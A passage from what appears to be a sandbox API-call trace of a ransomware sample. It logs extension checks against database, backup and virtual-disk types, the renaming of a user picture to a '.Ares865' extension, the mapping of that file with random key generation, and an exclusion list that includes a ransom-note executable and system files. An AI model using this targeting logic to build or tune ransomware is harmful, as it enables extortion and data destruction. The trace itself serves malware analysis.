(lpString="dacpac") returned 6 [0084.673] lstrcmpiW (lpString1="12.bmp", lpString2="dacpac") returned -1 [0084.673] lstrlenW (lpString="dad") returned 3 [0084.673] lstrcmpiW (lpString1="bmp", lpString2="dad") returned -1 [0084.673] lstrlenW (lpString="dadiagrams") returned 10 [0084.673] lstrcmpiW (lpString1="tile12.bmp", lpString2="dadiagrams") returned 1 [0084.673] lstrlenW (lpString="daschema") returned 8 [0084.673] lstrcmpiW (lpString1="le12.bmp", lpString2="daschema") returned 1 [0084.673] lstrlenW (lpString="db-journal") returned 10 [0084.673] lstrcmpiW (lpString1="tile12.bmp", lpString2="db-journal") returned 1 [0084.673] lstrlenW (lpString="db-shm") returned 6 [0084.673] lstrcmpiW (lpString1="12.bmp", lpString2="db-shm") returned -1 [0084.673] lstrlenW (lpString="db-wal") returned 6 [0084.673] lstrcmpiW (lpString1="12.bmp", lpString2="db-wal") returned -1 [0084.673] lstrlenW (lpString="dbc") returned 3 [0084.673] lstrcmpiW (lpString1="bmp", lpString2="dbc") returned -1 [0084.673] lstrlenW (lpString="dbs") returned 3 [0084.673] lstrcmpiW (lpString1="bmp", lpString2="dbs") returned -1 [0084.673] lstrlenW (lpString="dbt") returned 3 [0084.673] lstrcmpiW (lpString1="bmp", lpString2="dbt") returned -1 [0084.673] lstrlenW (lpString="dbv") returned 3 [0084.673] lstrcmpiW (lpString1="bmp", lpString2="dbv") returned -1 [0084.673] lstrlenW (lpString="dbx") returned 3 [0084.673] lstrcmpiW (lpString1="bmp", lpString2="dbx") returned -1 [0084.673] lstrlenW (lpString="dcb") returned 3 [0084.673] lstrcmpiW (lpString1="bmp", lpString2="dcb") returned -1 [0084.673] lstrlenW (lpString="dct") returned 3 [0084.673] lstrcmpiW (lpString1="bmp", lpString2="dct") returned -1 [0084.673] lstrlenW (lpString="dcx") returned 3 [0084.673] lstrcmpiW (lpString1="bmp", lpString2="dcx") returned -1 [0084.673] lstrlenW (lpString="ddl") returned 3 [0084.673] lstrcmpiW (lpString1="bmp", lpString2="ddl") returned -1 [0084.673] lstrlenW (lpString="dlis") returned 4 [0084.674] lstrcmpiW (lpString1=".bmp", lpString2="dlis") returned -1 [0084.674] lstrlenW (lpString="dp1") returned 3 [0084.674] lstrcmpiW (lpString1="bmp", lpString2="dp1") returned -1 [0084.674] lstrlenW (lpString="dqy") returned 3 [0084.674] lstrcmpiW (lpString1="bmp", lpString2="dqy") returned -1 [0084.674] lstrlenW (lpString="dsk") returned 3 [0084.674] lstrcmpiW (lpString1="bmp", lpString2="dsk") returned -1 [0084.674] lstrlenW (lpString="dsn") returned 3 [0084.674] lstrcmpiW (lpString1="bmp", lpString2="dsn") returned -1 [0084.674] lstrlenW (lpString="dtsx") returned 4 [0084.674] lstrcmpiW (lpString1=".bmp", lpString2="dtsx") returned -1 [0084.674] lstrlenW (lpString="dxl") returned 3 [0084.674] lstrcmpiW (lpString1="bmp", lpString2="dxl") returned -1 [0084.674] lstrlenW (lpString="eco") returned 3 [0084.674] lstrcmpiW (lpString1="bmp", lpString2="eco") returned -1 [0084.674] lstrlenW (lpString="ecx") returned 3 [0084.674] lstrcmpiW (lpString1="bmp", lpString2="ecx") returned -1 [0084.674] lstrlenW (lpString="edb") returned 3 [0084.674] lstrcmpiW (lpString1="bmp", lpString2="edb") returned -1 [0084.674] lstrlenW (lpString="epim") returned 4 [0084.674] lstrcmpiW (lpString1=".bmp", lpString2="epim") returned -1 [0084.674] lstrlenW (lpString="fcd") returned 3 [0084.674] lstrcmpiW (lpString1="bmp", lpString2="fcd") returned -1 [0084.674] lstrlenW (lpString="fdb") returned 3 [0084.674] lstrcmpiW (lpString1="bmp", lpString2="fdb") returned -1 [0084.674] lstrlenW (lpString="fic") returned 3 [0084.674] lstrcmpiW (lpString1="bmp", lpString2="fic") returned -1 [0084.674] lstrlenW (lpString="flexolibrary") returned 12 [0084.674] lstrcmpiW (lpString1="ertile12.bmp", lpString2="flexolibrary") returned -1 [0084.674] lstrlenW (lpString="fm5") returned 3 [0084.674] lstrcmpiW (lpString1="bmp", lpString2="fm5") returned -1 [0084.674] lstrlenW (lpString="fmp") returned 3 [0084.674] lstrcmpiW (lpString1="bmp", lpString2="fmp") returned -1 [0084.674] lstrlenW (lpString="fmp12") returned 5 [0084.674] lstrcmpiW (lpString1="2.bmp", lpString2="fmp12") returned -1 [0084.674] lstrlenW (lpString="fmpsl") returned 5 [0084.674] lstrcmpiW (lpString1="2.bmp", lpString2="fmpsl") returned -1 [0084.675] lstrlenW (lpString="fol") returned 3 [0084.675] lstrcmpiW (lpString1="bmp", lpString2="fol") returned -1 [0084.675] lstrlenW (lpString="fp3") returned 3 [0084.675] lstrcmpiW (lpString1="bmp", lpString2="fp3") returned -1 [0084.675] lstrlenW (lpString="fp4") returned 3 [0084.675] lstrcmpiW (lpString1="bmp", lpString2="fp4") returned -1 [0084.675] lstrlenW (lpString="fp5") returned 3 [0084.675] lstrcmpiW (lpString1="bmp", lpString2="fp5") returned -1 [0084.675] lstrlenW (lpString="fp7") returned 3 [0084.675] lstrcmpiW (lpString1="bmp", lpString2="fp7") returned -1 [0084.675] lstrlenW (lpString="fpt") returned 3 [0084.675] lstrcmpiW (lpString1="bmp", lpString2="fpt") returned -1 [0084.675] lstrlenW (lpString="frm") returned 3 [0084.675] lstrcmpiW (lpString1="bmp", lpString2="frm") returned -1 [0084.675] lstrlenW (lpString="gdb") returned 3 [0084.675] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0084.675] lstrlenW (lpString="gdb") returned 3 [0084.675] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0084.675] lstrlenW (lpString="grdb") returned 4 [0084.675] lstrcmpiW (lpString1=".bmp", lpString2="grdb") returned -1 [0084.675] lstrlenW (lpString="gwi") returned 3 [0084.675] lstrcmpiW (lpString1="bmp", lpString2="gwi") returned -1 [0084.675] lstrlenW (lpString="hdb") returned 3 [0084.675] lstrcmpiW (lpString1="bmp", lpString2="hdb") returned -1 [0084.675] lstrlenW (lpString="his") returned 3 [0084.675] lstrcmpiW (lpString1="bmp", lpString2="his") returned -1 [0084.675] lstrlenW (lpString="ib") returned 2 [0084.675] lstrcmpiW (lpString1="mp", lpString2="ib") returned 1 [0084.675] lstrlenW (lpString="idb") returned 3 [0084.675] lstrcmpiW (lpString1="bmp", lpString2="idb") returned -1 [0084.675] lstrlenW (lpString="ihx") returned 3 [0084.675] lstrcmpiW (lpString1="bmp", lpString2="ihx") returned -1 [0084.675] lstrlenW (lpString="itdb") returned 4 [0084.675] lstrcmpiW (lpString1=".bmp", lpString2="itdb") returned -1 [0084.675] lstrlenW (lpString="itw") returned 3 [0084.675] lstrcmpiW (lpString1="bmp", lpString2="itw") returned -1 [0084.675] lstrlenW (lpString="jet") returned 3 [0084.675] lstrcmpiW (lpString1="bmp", lpString2="jet") returned -1 [0084.676] lstrlenW (lpString="jtx") returned 3 [0084.676] lstrcmpiW (lpString1="bmp", lpString2="jtx") returned -1 [0084.676] lstrlenW (lpString="kdb") returned 3 [0084.676] lstrcmpiW (lpString1="bmp", lpString2="kdb") returned -1 [0084.676] lstrlenW (lpString="kexi") returned 4 [0084.676] lstrcmpiW (lpString1=".bmp", lpString2="kexi") returned -1 [0084.676] lstrlenW (lpString="kexic") returned 5 [0084.676] lstrcmpiW (lpString1="2.bmp", lpString2="kexic") returned -1 [0084.676] lstrlenW (lpString="kexis") returned 5 [0084.676] lstrcmpiW (lpString1="2.bmp", lpString2="kexis") returned -1 [0084.676] lstrlenW (lpString="lgc") returned 3 [0084.676] lstrcmpiW (lpString1="bmp", lpString2="lgc") returned -1 [0084.676] lstrlenW (lpString="lwx") returned 3 [0084.676] lstrcmpiW (lpString1="bmp", lpString2="lwx") returned -1 [0084.676] lstrlenW (lpString="maf") returned 3 [0084.676] lstrcmpiW (lpString1="bmp", lpString2="maf") returned -1 [0084.676] lstrlenW (lpString="maq") returned 3 [0084.676] lstrcmpiW (lpString1="bmp", lpString2="maq") returned -1 [0084.676] lstrlenW (lpString="mar") returned 3 [0084.676] lstrcmpiW (lpString1="bmp", lpString2="mar") returned -1 [0084.676] lstrlenW (lpString="marshal") returned 7 [0084.676] lstrcmpiW (lpString1="e12.bmp", lpString2="marshal") returned -1 [0084.676] lstrlenW (lpString="mas") returned 3 [0084.676] lstrcmpiW (lpString1="bmp", lpString2="mas") returned -1 [0084.676] lstrlenW (lpString="mav") returned 3 [0084.676] lstrcmpiW (lpString1="bmp", lpString2="mav") returned -1 [0084.676] lstrlenW (lpString="maw") returned 3 [0084.676] lstrcmpiW (lpString1="bmp", lpString2="maw") returned -1 [0084.676] lstrlenW (lpString="mdbhtml") returned 7 [0084.676] lstrcmpiW (lpString1="e12.bmp", lpString2="mdbhtml") returned -1 [0084.676] lstrlenW (lpString="mdn") returned 3 [0084.676] lstrcmpiW (lpString1="bmp", lpString2="mdn") returned -1 [0084.676] lstrlenW (lpString="mdt") returned 3 [0084.676] lstrcmpiW (lpString1="bmp", lpString2="mdt") returned -1 [0084.676] lstrlenW (lpString="mfd") returned 3 [0084.676] lstrcmpiW (lpString1="bmp", lpString2="mfd") returned -1 [0084.676] lstrlenW (lpString="mpd") returned 3 [0084.676] lstrcmpiW (lpString1="bmp", lpString2="mpd") returned -1 [0084.677] lstrlenW (lpString="mrg") returned 3 [0084.677] lstrcmpiW (lpString1="bmp", lpString2="mrg") returned -1 [0084.677] lstrlenW (lpString="mud") returned 3 [0084.677] lstrcmpiW (lpString1="bmp", lpString2="mud") returned -1 [0084.677] lstrlenW (lpString="mwb") returned 3 [0084.677] lstrcmpiW (lpString1="bmp", lpString2="mwb") returned -1 [0084.677] lstrlenW (lpString="myd") returned 3 [0084.677] lstrcmpiW (lpString1="bmp", lpString2="myd") returned -1 [0084.677] lstrlenW (lpString="ndf") returned 3 [0084.677] lstrcmpiW (lpString1="bmp", lpString2="ndf") returned -1 [0084.677] lstrlenW (lpString="nnt") returned 3 [0084.677] lstrcmpiW (lpString1="bmp", lpString2="nnt") returned -1 [0084.677] lstrlenW (lpString="nrmlib") returned 6 [0084.677] lstrcmpiW (lpString1="12.bmp", lpString2="nrmlib") returned -1 [0084.677] lstrlenW (lpString="ns2") returned 3 [0084.677] lstrcmpiW (lpString1="bmp", lpString2="ns2") returned -1 [0084.677] lstrlenW (lpString="ns3") returned 3 [0084.677] lstrcmpiW (lpString1="bmp", lpString2="ns3") returned -1 [0084.677] lstrlenW (lpString="ns4") returned 3 [0084.677] lstrcmpiW (lpString1="bmp", lpString2="ns4") returned -1 [0084.677] lstrlenW (lpString="nsf") returned 3 [0084.677] lstrcmpiW (lpString1="bmp", lpString2="nsf") returned -1 [0084.677] lstrlenW (lpString="nv") returned 2 [0084.677] lstrcmpiW (lpString1="mp", lpString2="nv") returned -1 [0084.677] lstrlenW (lpString="nv2") returned 3 [0084.677] lstrcmpiW (lpString1="bmp", lpString2="nv2") returned -1 [0084.677] lstrlenW (lpString="nwdb") returned 4 [0084.677] lstrcmpiW (lpString1=".bmp", lpString2="nwdb") returned -1 [0084.677] lstrlenW (lpString="nyf") returned 3 [0084.677] lstrcmpiW (lpString1="bmp", lpString2="nyf") returned -1 [0084.677] lstrlenW (lpString="odb") returned 3 [0084.677] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0084.677] lstrlenW (lpString="odb") returned 3 [0084.677] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0084.677] lstrlenW (lpString="oqy") returned 3 [0084.677] lstrcmpiW (lpString1="bmp", lpString2="oqy") returned -1 [0084.677] lstrlenW (lpString="ora") returned 3 [0084.677] lstrcmpiW (lpString1="bmp", lpString2="ora") returned -1 [0084.678] lstrlenW (lpString="orx") returned 3 [0084.678] lstrcmpiW (lpString1="bmp", lpString2="orx") returned -1 [0084.678] lstrlenW (lpString="owc") returned 3 [0084.678] lstrcmpiW (lpString1="bmp", lpString2="owc") returned -1 [0084.678] lstrlenW (lpString="p96") returned 3 [0084.678] lstrcmpiW (lpString1="bmp", lpString2="p96") returned -1 [0084.678] lstrlenW (lpString="p97") returned 3 [0084.678] lstrcmpiW (lpString1="bmp", lpString2="p97") returned -1 [0084.678] lstrlenW (lpString="pan") returned 3 [0084.678] lstrcmpiW (lpString1="bmp", lpString2="pan") returned -1 [0084.678] lstrlenW (lpString="pdb") returned 3 [0084.678] lstrcmpiW (lpString1="bmp", lpString2="pdb") returned -1 [0084.678] lstrlenW (lpString="pdm") returned 3 [0084.678] lstrcmpiW (lpString1="bmp", lpString2="pdm") returned -1 [0084.678] lstrlenW (lpString="pnz") returned 3 [0084.678] lstrcmpiW (lpString1="bmp", lpString2="pnz") returned -1 [0084.678] lstrlenW (lpString="qry") returned 3 [0084.678] lstrcmpiW (lpString1="bmp", lpString2="qry") returned -1 [0084.678] lstrlenW (lpString="qvd") returned 3 [0084.678] lstrcmpiW (lpString1="bmp", lpString2="qvd") returned -1 [0084.678] lstrlenW (lpString="rbf") returned 3 [0084.678] lstrcmpiW (lpString1="bmp", lpString2="rbf") returned -1 [0084.678] lstrlenW (lpString="rctd") returned 4 [0084.678] lstrcmpiW (lpString1=".bmp", lpString2="rctd") returned -1 [0084.678] lstrlenW (lpString="rod") returned 3 [0084.678] lstrcmpiW (lpString1="bmp", lpString2="rod") returned -1 [0084.678] lstrlenW (lpString="rodx") returned 4 [0084.678] lstrcmpiW (lpString1=".bmp", lpString2="rodx") returned -1 [0084.678] lstrlenW (lpString="rpd") returned 3 [0084.678] lstrcmpiW (lpString1="bmp", lpString2="rpd") returned -1 [0084.678] lstrlenW (lpString="rsd") returned 3 [0084.678] lstrcmpiW (lpString1="bmp", lpString2="rsd") returned -1 [0084.678] lstrlenW (lpString="sas7bdat") returned 8 [0084.678] lstrcmpiW (lpString1="le12.bmp", lpString2="sas7bdat") returned -1 [0084.678] lstrlenW (lpString="sbf") returned 3 [0084.678] lstrcmpiW (lpString1="bmp", lpString2="sbf") returned -1 [0084.678] lstrlenW (lpString="scx") returned 3 [0084.679] lstrcmpiW (lpString1="bmp", lpString2="scx") returned -1 [0084.679] lstrlenW (lpString="sdb") returned 3 [0084.679] lstrcmpiW (lpString1="bmp", lpString2="sdb") returned -1 [0084.679] lstrlenW (lpString="sdc") returned 3 [0084.679] lstrcmpiW (lpString1="bmp", lpString2="sdc") returned -1 [0084.679] lstrlenW (lpString="sdf") returned 3 [0084.679] lstrcmpiW (lpString1="bmp", lpString2="sdf") returned -1 [0084.679] lstrlenW (lpString="sis") returned 3 [0084.679] lstrcmpiW (lpString1="bmp", lpString2="sis") returned -1 [0084.679] lstrlenW (lpString="spq") returned 3 [0084.679] lstrcmpiW (lpString1="bmp", lpString2="spq") returned -1 [0084.679] lstrlenW (lpString="te") returned 2 [0084.679] lstrcmpiW (lpString1="mp", lpString2="te") returned -1 [0084.679] lstrlenW (lpString="teacher") returned 7 [0084.679] lstrcmpiW (lpString1="e12.bmp", lpString2="teacher") returned -1 [0084.679] lstrlenW (lpString="tmd") returned 3 [0084.679] lstrcmpiW (lpString1="bmp", lpString2="tmd") returned -1 [0084.679] lstrlenW (lpString="tps") returned 3 [0084.679] lstrcmpiW (lpString1="bmp", lpString2="tps") returned -1 [0084.679] lstrlenW (lpString="trc") returned 3 [0084.679] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0084.679] lstrlenW (lpString="trc") returned 3 [0084.679] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0084.679] lstrlenW (lpString="trm") returned 3 [0084.679] lstrcmpiW (lpString1="bmp", lpString2="trm") returned -1 [0084.679] lstrlenW (lpString="udb") returned 3 [0084.679] lstrcmpiW (lpString1="bmp", lpString2="udb") returned -1 [0084.679] lstrlenW (lpString="udl") returned 3 [0084.679] lstrcmpiW (lpString1="bmp", lpString2="udl") returned -1 [0084.679] lstrlenW (lpString="usr") returned 3 [0084.679] lstrcmpiW (lpString1="bmp", lpString2="usr") returned -1 [0084.679] lstrlenW (lpString="v12") returned 3 [0084.679] lstrcmpiW (lpString1="bmp", lpString2="v12") returned -1 [0084.679] lstrlenW (lpString="vis") returned 3 [0084.679] lstrcmpiW (lpString1="bmp", lpString2="vis") returned -1 [0084.679] lstrlenW (lpString="vpd") returned 3 [0084.679] lstrcmpiW (lpString1="bmp", lpString2="vpd") returned -1 [0084.679] lstrlenW (lpString="vvv") returned 3 [0084.680] lstrcmpiW (lpString1="bmp", lpString2="vvv") returned -1 [0084.680] lstrlenW (lpString="wdb") returned 3 [0084.680] lstrcmpiW (lpString1="bmp", lpString2="wdb") returned -1 [0084.680] lstrlenW (lpString="wmdb") returned 4 [0084.680] lstrcmpiW (lpString1=".bmp", lpString2="wmdb") returned -1 [0084.680] lstrlenW (lpString="wrk") returned 3 [0084.680] lstrcmpiW (lpString1="bmp", lpString2="wrk") returned -1 [0084.680] lstrlenW (lpString="xdb") returned 3 [0084.680] lstrcmpiW (lpString1="bmp", lpString2="xdb") returned -1 [0084.680] lstrlenW (lpString="xld") returned 3 [0084.680] lstrcmpiW (lpString1="bmp", lpString2="xld") returned -1 [0084.680] lstrlenW (lpString="xmlff") returned 5 [0084.680] lstrcmpiW (lpString1="2.bmp", lpString2="xmlff") returned -1 [0084.680] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp.Ares865") returned 90 [0084.680] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile12.bmp"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile12.bmp.ares865"), dwFlags=0x1) returned 1 [0084.681] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile12.bmp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0084.681] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=49208) returned 1 [0084.681] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0084.681] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0084.681] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0084.681] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0084.682] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0084.682] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0084.682] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc340, lpName=0x0) returned 0x15c [0084.684] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc340) returned 0x190000 [0084.689] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0084.690] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0084.690] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0084.690] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0084.690] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0084.690] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0084.690] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0084.690] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0084.690] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0084.690] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0084.690] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0084.690] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0084.690] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0084.690] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0084.691] CloseHandle (hObject=0x15c) returned 1 [0084.691] CloseHandle (hObject=0x118) returned 1 [0084.691] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0084.691] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0084.691] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0084.691] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae29b72e, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae29b72e, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdb76b98f, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xbeb8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile13.bmp", cAlternateFileName="")) returned 1 [0084.691] lstrcmpiW (lpString1="usertile13.bmp", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0084.691] lstrcmpiW (lpString1="usertile13.bmp", lpString2="aoldtz.exe") returned 1 [0084.691] lstrcmpiW (lpString1="usertile13.bmp", lpString2=".") returned 1 [0084.691] lstrcmpiW (lpString1="usertile13.bmp", lpString2="..") returned 1 [0084.691] lstrcmpiW (lpString1="usertile13.bmp", lpString2="windows") returned -1 [0084.691] lstrcmpiW (lpString1="usertile13.bmp", lpString2="bootmgr") returned 1 [0084.691] lstrcmpiW (lpString1="usertile13.bmp", lpString2="temp") returned 1 [0084.692] lstrcmpiW (lpString1="usertile13.bmp", lpString2="pagefile.sys") returned 1 [0084.692] lstrcmpiW (lpString1="usertile13.bmp", lpString2="boot") returned 1 [0084.692] lstrcmpiW (lpString1="usertile13.bmp", lpString2="ids.txt") returned 1 [0084.692] lstrcmpiW (lpString1="usertile13.bmp", lpString2="ntuser.dat") returned 1 [0084.692] lstrcmpiW (lpString1="usertile13.bmp", lpString2="perflogs") returned 1 [0084.692] lstrcmpiW (lpString1="usertile13.bmp", lpString2="MSBuild") returned 1 [0084.692] lstrlenW (lpString="usertile13.bmp") returned 14 [0084.692] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp") returned 82 [0084.692] lstrcpyW (in: lpString1=0x2cce488, lpString2="usertile13.bmp" | out: lpString1="usertile13.bmp") returned="usertile13.bmp" [0084.692] lstrlenW (lpString="usertile13.bmp") returned 14 [0084.692] lstrlenW (lpString="Ares865") returned 7 [0084.692] lstrcmpiW (lpString1="e13.bmp", lpString2="Ares865") returned 1 [0084.692] lstrlenW (lpString=".dll") returned 4 [0084.692] lstrcmpiW (lpString1="usertile13.bmp", lpString2=".dll") returned 1 [0084.692] lstrlenW (lpString=".lnk") returned 4 [0084.692] lstrcmpiW (lpString1="usertile13.bmp", lpString2=".lnk") returned 1 [0084.692] lstrlenW (lpString=".ini") returned 4 [0084.692] lstrcmpiW (lpString1="usertile13.bmp", lpString2=".ini") returned 1 [0084.692] lstrlenW (lpString=".sys") returned 4 [0084.692] lstrcmpiW (lpString1="usertile13.bmp", lpString2=".sys") returned 1 [0084.692] lstrlenW (lpString="usertile13.bmp") returned 14 [0084.692] lstrlenW (lpString="bak") returned 3 [0084.692] lstrcmpiW (lpString1="bmp", lpString2="bak") returned 1 [0084.692] lstrlenW (lpString="ba_") returned 3 [0084.692] lstrcmpiW (lpString1="bmp", lpString2="ba_") returned 1 [0084.692] lstrlenW (lpString="dbb") returned 3 [0084.692] lstrcmpiW (lpString1="bmp", lpString2="dbb") returned -1 [0084.692] lstrlenW (lpString="vmdk") returned 4 [0084.692] lstrcmpiW (lpString1=".bmp", lpString2="vmdk") returned -1 [0084.692] lstrlenW (lpString="rar") returned 3 [0084.692] lstrcmpiW (lpString1="bmp", lpString2="rar") returned -1 [0084.693] lstrlenW (lpString="zip") returned 3 [0084.693] lstrcmpiW (lpString1="bmp", lpString2="zip") returned -1 [0084.693] lstrlenW (lpString="tgz") returned 3 [0084.693] lstrcmpiW (lpString1="bmp", lpString2="tgz") returned -1 [0084.693] lstrlenW (lpString="vbox") returned 4 [0084.693] lstrcmpiW (lpString1=".bmp", lpString2="vbox") returned -1 [0084.693] lstrlenW (lpString="vdi") returned 3 [0084.693] lstrcmpiW (lpString1="bmp", lpString2="vdi") returned -1 [0084.693] lstrlenW (lpString="vhd") returned 3 [0084.693] lstrcmpiW (lpString1="bmp", lpString2="vhd") returned -1 [0084.693] lstrlenW (lpString="vhdx") returned 4 [0084.693] lstrcmpiW (lpString1=".bmp", lpString2="vhdx") returned -1 [0084.693] lstrlenW (lpString="avhd") returned 4 [0084.693] lstrcmpiW (lpString1=".bmp", lpString2="avhd") returned -1 [0084.693] lstrlenW (lpString="db") returned 2 [0084.693] lstrcmpiW (lpString1="mp", lpString2="db") returned 1 [0084.693] lstrlenW (lpString="db2") returned 3 [0084.693] lstrcmpiW (lpString1="bmp", lpString2="db2") returned -1 [0084.693] lstrlenW (lpString="db3") returned 3 [0084.693] lstrcmpiW (lpString1="bmp", lpString2="db3") returned -1 [0084.693] lstrlenW (lpString="dbf") returned 3 [0084.693] lstrcmpiW (lpString1="bmp", lpString2="dbf") returned -1 [0084.693] lstrlenW (lpString="mdf") returned 3 [0084.693] lstrcmpiW (lpString1="bmp", lpString2="mdf") returned -1 [0084.693] lstrlenW (lpString="mdb") returned 3 [0084.693] lstrcmpiW (lpString1="bmp", lpString2="mdb") returned -1 [0084.693] lstrlenW (lpString="sql") returned 3 [0084.693] lstrcmpiW (lpString1="bmp", lpString2="sql") returned -1 [0084.693] lstrlenW (lpString="sqlite") returned 6 [0084.693] lstrcmpiW (lpString1="13.bmp", lpString2="sqlite") returned -1 [0084.693] lstrlenW (lpString="sqlite3") returned 7 [0084.694] lstrcmpiW (lpString1="e13.bmp", lpString2="sqlite3") returned -1 [0084.694] lstrlenW (lpString="sqlitedb") returned 8 [0084.694] lstrcmpiW (lpString1="le13.bmp", lpString2="sqlitedb") returned -1 [0084.694] lstrlenW (lpString="xml") returned 3 [0084.694] lstrcmpiW (lpString1="bmp", lpString2="xml") returned -1 [0084.694] lstrlenW (lpString="$er") returned 3 [0084.694] lstrcmpiW (lpString1="bmp", lpString2="$er") returned 1 [0084.694] lstrlenW (lpString="4dd") returned 3 [0084.694] lstrcmpiW (lpString1="bmp", lpString2="4dd") returned 1 [0084.694] lstrlenW (lpString="4dl") returned 3 [0084.694] lstrcmpiW (lpString1="bmp", lpString2="4dl") returned 1 [0084.694] lstrlenW (lpString="^^^") returned 3 [0084.694] lstrcmpiW (lpString1="bmp", lpString2="^^^") returned 1 [0084.694] lstrlenW (lpString="abs") returned 3 [0084.694] lstrcmpiW (lpString1="bmp", lpString2="abs") returned 1 [0084.694] lstrlenW (lpString="abx") returned 3 [0084.694] lstrcmpiW (lpString1="bmp", lpString2="abx") returned 1 [0084.694] lstrlenW (lpString="accdb") returned 5 [0084.694] lstrcmpiW (lpString1="3.bmp", lpString2="accdb") returned -1 [0084.694] lstrlenW (lpString="accdc") returned 5 [0084.694] lstrcmpiW (lpString1="3.bmp", lpString2="accdc") returned -1 [0084.694] lstrlenW (lpString="accde") returned 5 [0084.694] lstrcmpiW (lpString1="3.bmp", lpString2="accde") returned -1 [0084.694] lstrlenW (lpString="accdr") returned 5 [0084.694] lstrcmpiW (lpString1="3.bmp", lpString2="accdr") returned -1 [0084.694] lstrlenW (lpString="accdt") returned 5 [0084.694] lstrcmpiW (lpString1="3.bmp", lpString2="accdt") returned -1 [0084.694] lstrlenW (lpString="accdw") returned 5 [0084.694] lstrcmpiW (lpString1="3.bmp", lpString2="accdw") returned -1 [0084.694] lstrlenW (lpString="accft") returned 5 [0084.694] lstrcmpiW (lpString1="3.bmp", lpString2="accft") returned -1 [0084.694] lstrlenW (lpString="adb") returned 3 [0084.695] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0084.695] lstrlenW (lpString="adb") returned 3 [0084.695] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0084.695] lstrlenW 